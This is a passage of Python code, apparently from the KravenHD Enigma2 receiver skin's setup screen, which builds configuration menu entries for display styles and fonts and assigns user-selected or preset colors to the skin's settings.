config.plugins.KravenHD.CategoryECMInfos, _(\"This sections offers all settings for showing the decryption infos.\")))\n\t\tlist.append(getConfigListEntry(_(\"Show ECM Infos\"), config.plugins.KravenHD.ECMVisible, _(\"Choose from different options where to display the ECM informations.\")))\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\" and not config.plugins.KravenHD.ECMVisible.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLine1, _(\"Choose from different options to display the ECM informations.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show 'free to air'\"), config.plugins.KravenHD.FTA, _(\"Choose whether 'free to air' is displayed or not for unencrypted channels.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM-Font\"), config.plugins.KravenHD.ECMFontList, _(\"Choose the font color of the ECM information. Press OK to define your own RGB color.\")))\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\") and not config.plugins.KravenHD.ECMVisible.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLine2, _(\"Choose from different options to display the ECM informations.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show 'free to air'\"), config.plugins.KravenHD.FTA, _(\"Choose whether 'free to air' is displayed or not for unencrypted channels.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM-Font\"), config.plugins.KravenHD.ECMFontList, _(\"Choose the font color of the ECM information. Press OK to define your own RGB color.\")))\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\") and not config.plugins.KravenHD.ECMVisible.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLine3, _(\"Choose from different options to display the ECM informations.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show 'free to air'\"), config.plugins.KravenHD.FTA, _(\"Choose whether 'free to air' is displayed or not for unencrypted channels.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM-Font\"), config.plugins.KravenHD.ECMFontList, _(\"Choose the font color of the ECM information. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=3\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 6 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"VIEWS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryViews, _(\"This sections offers all settings for skinned plugins.\")))\n\t\tlist.append(getConfigListEntry(_(\"Volume\"), config.plugins.KravenHD.Volume, _(\"Choose from different styles for the volume display.\")))\n\t\tlist.append(getConfigListEntry(_(\"SecondInfobar\"), config.plugins.KravenHD.SIB, _(\"Choose from different styles for SecondInfobar. \\nActivate the SecondInfobar in the \\nOSD settings. \\n2nd infobar -> 2nd Infobar INFO\")))\n\t\tlist.append(getConfigListEntry(_(\"CoolTVGuide\"), config.plugins.KravenHD.CoolTVGuide, _(\"Choose from different styles for CoolTVGuide.\")))\n\t\tlist.append(getConfigListEntry(_(\"MovieSelection\"), config.plugins.KravenHD.MovieSelection, _(\"Choose from different styles for MovieSelection.\")))\n\t\tlist.append(getConfigListEntry(_(\"EPGSelection\"), config.plugins.KravenHD.EPGSelection, _(\"Choose from different styles to display EPGSelection.\")))\n\t\tlist.append(getConfigListEntry(_(\"SerienRecorder\"), config.plugins.KravenHD.SerienRecorder, _(\"Choose whether you want the Kraven skin to be applied to 'Serienrecorder' or not. Activation of this option prohibits the skin selection in the SR-plugin.\")))\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\"):\n\t\t\tlist.append(getConfigListEntry(_(\"MediaPortal\"), config.plugins.KravenHD.MediaPortal, _(\"Choose whether you want the Kraven skin to be applied to 'MediaPortal' or not. To remove it again, you must deactivate it here and activate another skin in 'MediaPortal'.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"FileCommander\"), config.plugins.KravenHD.FileCommander, _(\"Choose from different styles to display FileCommander.\")))\n\t\tlist.append(getConfigListEntry(_(\"Popups\"), config.plugins.KravenHD.PopupStyle, _(\"Choose from different styles to display popups like 'MessageBox', 'ChoiceBox', 'ExtensionsList', 'VirtualKeyboard' and more.\")))\n\t\tlist.append(getConfigListEntry(_(\"PermanentClock-Color\"), config.plugins.KravenHD.PermanentClock, _(\"Choose the colors of PermanentClock.\")))\n\t\tif config.plugins.KravenHD.PermanentClock.value in (\"permanentclock-transparent-big\", \"permanentclock-transparent-small\"):\n\t\t\tlist.append(getConfigListEntry(_(\"PermanentClock-Font\"), config.plugins.KravenHD.PermanentClockFontList, _(\"Choose the font color of PermanentClock. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 7\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"CHANNELLIST ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryChannellist, _(\"This sections offers all channellist settings.\")))\n\t\tif SystemInfo.get(\"NumVideoDecoders\", 1) > 1:\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Style\"), config.plugins.KravenHD.ChannelSelectionStyle2, _(\"Choose from different styles for the channel selection screen.\")))\n\t\t\tself.actChannelselectionstyle=config.plugins.KravenHD.ChannelSelectionStyle2.value\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Style\"), config.plugins.KravenHD.ChannelSelectionStyle, _(\"Choose from different styles for the channel selection screen.\")))\n\t\t\tself.actChannelselectionstyle=config.plugins.KravenHD.ChannelSelectionStyle.value\n\t\tif self.actChannelselectionstyle in (\"channelselection-style-minitv\", \"channelselection-style-minitv2\", \"channelselection-style-minitv22\", \"channelselection-style-minitv33\", \"channelselection-style-minitv4\", \"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv33\", \"channelselection-style-minitv-picon\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Mode\"), config.plugins.KravenHD.ChannelSelectionMode, _(\"Choose between direct zapping (1xOK) and zapping after preview (2xOK).\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tif not self.actChannelselectionstyle in (\"channelselection-style-minitv\", \"channelselection-style-minitv2\", \"channelselection-style-minitv3\", \"channelselection-style-minitv4\", \"channelselection-style-minitv22\", \"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv3\", \"channelselection-style-minitv-picon\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Transparenz\"), config.plugins.KravenHD.ChannelSelectionTrans, _(\"Choose the degree of background transparency for the channellists.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tif self.actChannelselectionstyle in (\"channelselection-style-nobile\", \"channelselection-style-nobile2\", \"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv3\", \"channelselection-style-nobile-minitv33\"):\n\t\t\tlist.append(getConfigListEntry(_(\"EPG Fontsize\"), config.plugins.KravenHD.ChannelSelectionEPGSize1, _(\"Choose the font size of event description, EPG list and primetime.\")))\n\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv22\":\n\t\t\tlist.append(getConfigListEntry(_(\"EPG Fontsize\"), config.plugins.KravenHD.ChannelSelectionEPGSize2, _(\"Choose the font size of EPG list and primetime.\")))\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"EPG Fontsize\"), config.plugins.KravenHD.ChannelSelectionEPGSize3, _(\"Choose the font size of event description, EPG list and primetime.\")))\n\t\tlist.append(getConfigListEntry(_(\"'Not available'-Font\"), config.plugins.KravenHD.ChannelSelectionServiceNAList, _(\"Choose the font color of channels that are unavailable at the moment. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Primetime\"), config.plugins.KravenHD.Primetimeavailable, _(\"Choose whether primetime program information is displayed or not.\")))\n\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\":\n\t\t\tlist.append(getConfigListEntry(_(\"Primetime-Time\"), config.plugins.KravenHD.Primetime, _(\"Specify the time for your primetime.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Primetime-Font\"), config.plugins.KravenHD.PrimetimeFontList, _(\"Choose the font color of the primetime information. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=2\n\t\tfor i in range(emptyLines+5):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 7 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"NUMBERZAP ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryNumberZap, _(\"This sections offers all settings for NumberZap.\")))\n\t\tlist.append(getConfigListEntry(_(\"NumberZap-Style\"), config.plugins.KravenHD.NumberZapExt, _(\"Choose from different styles for NumberZap.\")))\n\t\tif not config.plugins.KravenHD.NumberZapExt.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"Border Color\"), config.plugins.KravenHD.NZBorderList, _(\"Choose the border color for NumberZap. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 8\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"GRAPHICALEPG ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryGraphicalEPG, _(\"This sections offers all settings for GraphicalEPG.\")))\n\t\tlist.append(getConfigListEntry(_(\"GraphicalEPG-Style\"), config.plugins.KravenHD.GraphicalEPG, _(\"Choose from different styles for GraphicalEPG.\")))\n\t\tlist.append(getConfigListEntry(_(\"Event Description Fontsize\"), config.plugins.KravenHD.GMEDescriptionSize, _(\"Choose the font size of event description.\")))\n\t\tif config.plugins.KravenHD.GraphicalEPG.value in (\"text\", \"text-minitv\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Selected Event Fontcolor\"), config.plugins.KravenHD.GMESelFgList, _(\"Choose the font color of selected events for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Selected Event Background\"), config.plugins.KravenHD.GMESelBgList, _(\"Choose the background color of selected events for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Running Event Fontcolor\"), config.plugins.KravenHD.GMENowFgList, _(\"Choose the font color of running events for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Running Event Background\"), config.plugins.KravenHD.GMENowBgList, _(\"Choose the background color of running events for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Border Color\"), config.plugins.KravenHD.GMEBorderList, _(\"Choose the border color for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=5\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 8 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"ENHANCED MOVIE CENTER ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryEMC, _(\"This sections offers all settings for EMC ('EnhancedMovieCenter').\")))\n\t\tlist.append(getConfigListEntry(_(\"EMC-Style\"), config.plugins.KravenHD.EMCStyle, _(\"Choose from different styles for EnhancedMovieCenter.\")))\n\t\tlist.append(getConfigListEntry(_(\"Unwatched Color\"), config.plugins.KravenHD.UnwatchedColorList, _(\"Choose the font color of unwatched movies. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Watching Color\"), config.plugins.KravenHD.WatchingColorList, _(\"Choose the font color of watching movies. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Finished Color\"), config.plugins.KravenHD.FinishedColorList, _(\"Choose the font color of watched movies. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"EMC-Selection-Colors\"), config.plugins.KravenHD.EMCSelectionColors, _(\"Choose whether you want to customize the selection-colors for EnhancedMovieCenter.\")))\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"custom\":\n\t\t\tlist.append(getConfigListEntry(_(\"EMC-Listselection\"), config.plugins.KravenHD.EMCSelectionBackgroundList, _(\"Choose the background color of selection bars for EnhancedMovieCenter. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"EMC-Selection-Font\"), config.plugins.KravenHD.EMCSelectionFontList, _(\"Choose the color of the font in selection bars for EnhancedMovieCenter. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=2\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 9\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"PLAYER ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryPlayers, _(\"This sections offers all settings for the movie players.\")))\n\t\tlist.append(getConfigListEntry(_(\"Clock\"), config.plugins.KravenHD.PlayerClock, _(\"Choose from different options to show the clock in the players.\")))\n\t\tif config.plugins.KravenHD.PlayerClock.value == \"player-android\":\n\t\t\tlist.append(getConfigListEntry(_(\"Android-Temp-Color\"), config.plugins.KravenHD.Android2List, _(\"Choose the font color of android-clock temperature. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"PVRState\"), config.plugins.KravenHD.PVRState, _(\"Choose from different options to display the PVR state.\")))\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\t\t\n\t\t# page 9 (category 2)\n\t\temptyLines=0\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tlist.append(getConfigListEntry(_(\"ANTIALIASING BRIGHTNESS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryAntialiasing, _(\"This sections offers all antialiasing settings. Distortions or color frames around fonts can be reduced by this settings.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar\"), config.plugins.KravenHD.InfobarAntialias, _(\"Reduce distortions (faint/blurry) or color frames around fonts in the infobar and widgets by adjusting the antialiasing brightness.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLineAntialias, _(\"Reduce distortions (faint/blurry) or color frames around the ECM information in the infobar by adjusting the antialiasing brightness.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Screens\"), config.plugins.KravenHD.ScreensAntialias, _(\"Reduce distortions (faint/blurry) or color frames around fonts at top and bottom of screens by adjusting the antialiasing brightness.\")))\n\t\t\temptyLines=1\n\t\telse:\n\t\t\temptyLines+=0\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 9 (category 3)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"VARIOUS SETTINGS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryVarious, _(\"This sections offers various settings.\")))\n\t\tlist.append(getConfigListEntry(_(\"Screennames\"), config.plugins.KravenHD.DebugNames, _(\"Activate or deactivate small screen names for debugging purposes.\")))\n\t\tlist.append(getConfigListEntry(_(\"Icon-Font vertical position\"), config.plugins.KravenHD.KravenIconVPosition, _(\"Correct the vertical font position within some icons for the infobars and players.\")))\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t### Assign list or self color\n\t\tif config.plugins.KravenHD.BackgroundListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundColor.value = config.plugins.KravenHD.BackgroundSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundColor.value = config.plugins.KravenHD.BackgroundListColor.value\n\t\tif config.plugins.KravenHD.InfobarBoxListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarBoxColor.value = config.plugins.KravenHD.InfobarBoxSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarBoxColor.value = config.plugins.KravenHD.InfobarBoxListColor.value\n\t\tif config.plugins.KravenHD.InfobarGradientListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColor.value = config.plugins.KravenHD.InfobarGradientSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColor.value = config.plugins.KravenHD.InfobarGradientListColor.value\n\t\tif config.plugins.KravenHD.SelectionBackgroundList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionBackground.value = config.plugins.KravenHD.SelectionBackgroundSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionBackground.value = config.plugins.KravenHD.SelectionBackgroundList.value\n\t\tif config.plugins.KravenHD.SelectionBackground2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionBackground2.value = config.plugins.KravenHD.SelectionBackground2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionBackground2.value = config.plugins.KravenHD.SelectionBackground2List.value\n\t\tif config.plugins.KravenHD.SelectionBorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionBorder.value = config.plugins.KravenHD.SelectionBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionBorder.value = config.plugins.KravenHD.SelectionBorderList.value\n\t\tif config.plugins.KravenHD.Font1List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Font1.value = config.plugins.KravenHD.Font1Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Font1.value = config.plugins.KravenHD.Font1List.value\n\t\tif config.plugins.KravenHD.Font2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Font2.value = config.plugins.KravenHD.Font2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Font2.value = config.plugins.KravenHD.Font2List.value\n\t\tif config.plugins.KravenHD.IBFont1List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBFont1.value = config.plugins.KravenHD.IBFont1Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBFont1.value = config.plugins.KravenHD.IBFont1List.value\n\t\tif config.plugins.KravenHD.IBFont2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBFont2.value = config.plugins.KravenHD.IBFont2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBFont2.value = config.plugins.KravenHD.IBFont2List.value\n\t\tif config.plugins.KravenHD.BackgroundGradientListColorPrimary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorPrimary.value = config.plugins.KravenHD.BackgroundGradientSelfColorPrimary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorPrimary.value = config.plugins.KravenHD.BackgroundGradientListColorPrimary.value\n\t\tif config.plugins.KravenHD.BackgroundGradientListColorSecondary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorSecondary.value = config.plugins.KravenHD.BackgroundGradientSelfColorSecondary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorSecondary.value = config.plugins.KravenHD.BackgroundGradientListColorSecondary.value\n\t\tif config.plugins.KravenHD.InfobarGradientListColorPrimary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorPrimary.value = config.plugins.KravenHD.InfobarGradientSelfColorPrimary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorPrimary.value = config.plugins.KravenHD.InfobarGradientListColorPrimary.value\n\t\tif config.plugins.KravenHD.InfobarGradientListColorSecondary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorSecondary.value = config.plugins.KravenHD.InfobarGradientSelfColorSecondary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorSecondary.value = config.plugins.KravenHD.InfobarGradientListColorSecondary.value\n\t\tif config.plugins.KravenHD.BackgroundAlternateListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundAlternateColor.value = config.plugins.KravenHD.BackgroundAlternateSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundAlternateColor.value = config.plugins.KravenHD.BackgroundAlternateListColor.value\n\t\tif config.plugins.KravenHD.InfobarAlternateListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarAlternateColor.value = config.plugins.KravenHD.InfobarAlternateSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarAlternateColor.value = config.plugins.KravenHD.InfobarAlternateListColor.value\n\t\tif config.plugins.KravenHD.MarkedFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.MarkedFont.value = config.plugins.KravenHD.MarkedFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MarkedFont.value = config.plugins.KravenHD.MarkedFontList.value\n\t\tif config.plugins.KravenHD.SelectionFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionFont.value = config.plugins.KravenHD.SelectionFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionFont.value = config.plugins.KravenHD.SelectionFontList.value\n\t\tif config.plugins.KravenHD.PermanentClockFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.PermanentClockFont.value = config.plugins.KravenHD.PermanentClockFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.PermanentClockFont.value = config.plugins.KravenHD.PermanentClockFontList.value\n\t\tif config.plugins.KravenHD.ECMFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ECMFont.value = config.plugins.KravenHD.ECMFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ECMFont.value = config.plugins.KravenHD.ECMFontList.value\n\t\tif config.plugins.KravenHD.ChannelnameFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ChannelnameFont.value = config.plugins.KravenHD.ChannelnameFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ChannelnameFont.value = config.plugins.KravenHD.ChannelnameFontList.value\n\t\tif config.plugins.KravenHD.PrimetimeFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.PrimetimeFont.value = config.plugins.KravenHD.PrimetimeFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.PrimetimeFont.value = config.plugins.KravenHD.PrimetimeFontList.value\n\t\tif config.plugins.KravenHD.ButtonTextList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ButtonText.value = config.plugins.KravenHD.ButtonTextSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ButtonText.value = config.plugins.KravenHD.ButtonTextList.value\n\t\tif config.plugins.KravenHD.AndroidList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Android.value = config.plugins.KravenHD.AndroidSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Android.value = config.plugins.KravenHD.AndroidList.value\n\t\tif config.plugins.KravenHD.BorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Border.value = config.plugins.KravenHD.BorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Border.value = config.plugins.KravenHD.BorderList.value\n\t\tif config.plugins.KravenHD.ProgressList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Progress.value = config.plugins.KravenHD.ProgressSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Progress.value = config.plugins.KravenHD.ProgressList.value\n\t\tif config.plugins.KravenHD.LineList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Line.value = config.plugins.KravenHD.LineSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Line.value = config.plugins.KravenHD.LineList.value\n\t\tif config.plugins.KravenHD.IBLineList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBLine.value = config.plugins.KravenHD.IBLineSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBLine.value = config.plugins.KravenHD.IBLineList.value\n\t\tif config.plugins.KravenHD.MiniTVBorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.MiniTVBorder.value = config.plugins.KravenHD.MiniTVBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MiniTVBorder.value = config.plugins.KravenHD.MiniTVBorderList.value\n\t\tif config.plugins.KravenHD.AnalogColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.AnalogColor.value = config.plugins.KravenHD.AnalogColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.AnalogColor.value = config.plugins.KravenHD.AnalogColorList.value\n\t\tif config.plugins.KravenHD.ChannelSelectionServiceNAList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ChannelSelectionServiceNA.value = config.plugins.KravenHD.ChannelSelectionServiceNASelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ChannelSelectionServiceNA.value = config.plugins.KravenHD.ChannelSelectionServiceNAList.value\n\t\tif config.plugins.KravenHD.NZBorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.NZBorder.value = config.plugins.KravenHD.NZBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.NZBorder.value = config.plugins.KravenHD.NZBorderList.value\n\t\tif config.plugins.KravenHD.GMESelFgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMESelFg.value = config.plugins.KravenHD.GMESelFgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMESelFg.value = config.plugins.KravenHD.GMESelFgList.value\n\t\tif config.plugins.KravenHD.GMESelBgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMESelBg.value = config.plugins.KravenHD.GMESelBgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMESelBg.value = config.plugins.KravenHD.GMESelBgList.value\n\t\tif config.plugins.KravenHD.GMENowFgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMENowFg.value = config.plugins.KravenHD.GMENowFgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMENowFg.value = config.plugins.KravenHD.GMENowFgList.value\n\t\tif config.plugins.KravenHD.GMENowBgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMENowBg.value = config.plugins.KravenHD.GMENowBgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMENowBg.value = config.plugins.KravenHD.GMENowBgList.value\n\t\tif config.plugins.KravenHD.GMEBorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMEBorder.value = config.plugins.KravenHD.GMEBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMEBorder.value = config.plugins.KravenHD.GMEBorderList.value\n\t\tif config.plugins.KravenHD.EMCSelectionBackgroundList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.EMCSelectionBackground.value = config.plugins.KravenHD.EMCSelectionBackgroundSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.EMCSelectionBackground.value = config.plugins.KravenHD.EMCSelectionBackgroundList.value\n\t\tif config.plugins.KravenHD.EMCSelectionFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.EMCSelectionFont.value = config.plugins.KravenHD.EMCSelectionFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.EMCSelectionFont.value = config.plugins.KravenHD.EMCSelectionFontList.value\n\t\tif config.plugins.KravenHD.Android2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Android2.value = config.plugins.KravenHD.Android2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Android2.value = config.plugins.KravenHD.Android2List.value\n\t\tif config.plugins.KravenHD.UnwatchedColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.UnwatchedColor.value = config.plugins.KravenHD.UnwatchedColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.UnwatchedColor.value = config.plugins.KravenHD.UnwatchedColorList.value\n\t\tif config.plugins.KravenHD.WatchingColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.WatchingColor.value = config.plugins.KravenHD.WatchingColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.WatchingColor.value = config.plugins.KravenHD.WatchingColorList.value\n\t\tif config.plugins.KravenHD.FinishedColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.FinishedColor.value = config.plugins.KravenHD.FinishedColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.FinishedColor.value = config.plugins.KravenHD.FinishedColorList.value\n\t\tif config.plugins.KravenHD.TunerBusyList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerBusy.value = config.plugins.KravenHD.TunerBusySelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerBusy.value = config.plugins.KravenHD.TunerBusyList.value\n\t\tif config.plugins.KravenHD.TunerLiveList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerLive.value = config.plugins.KravenHD.TunerLiveSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerLive.value = config.plugins.KravenHD.TunerLiveList.value\n\t\tif config.plugins.KravenHD.TunerRecordList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerRecord.value = config.plugins.KravenHD.TunerRecordSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerRecord.value = config.plugins.KravenHD.TunerRecordList.value\n\t\tif 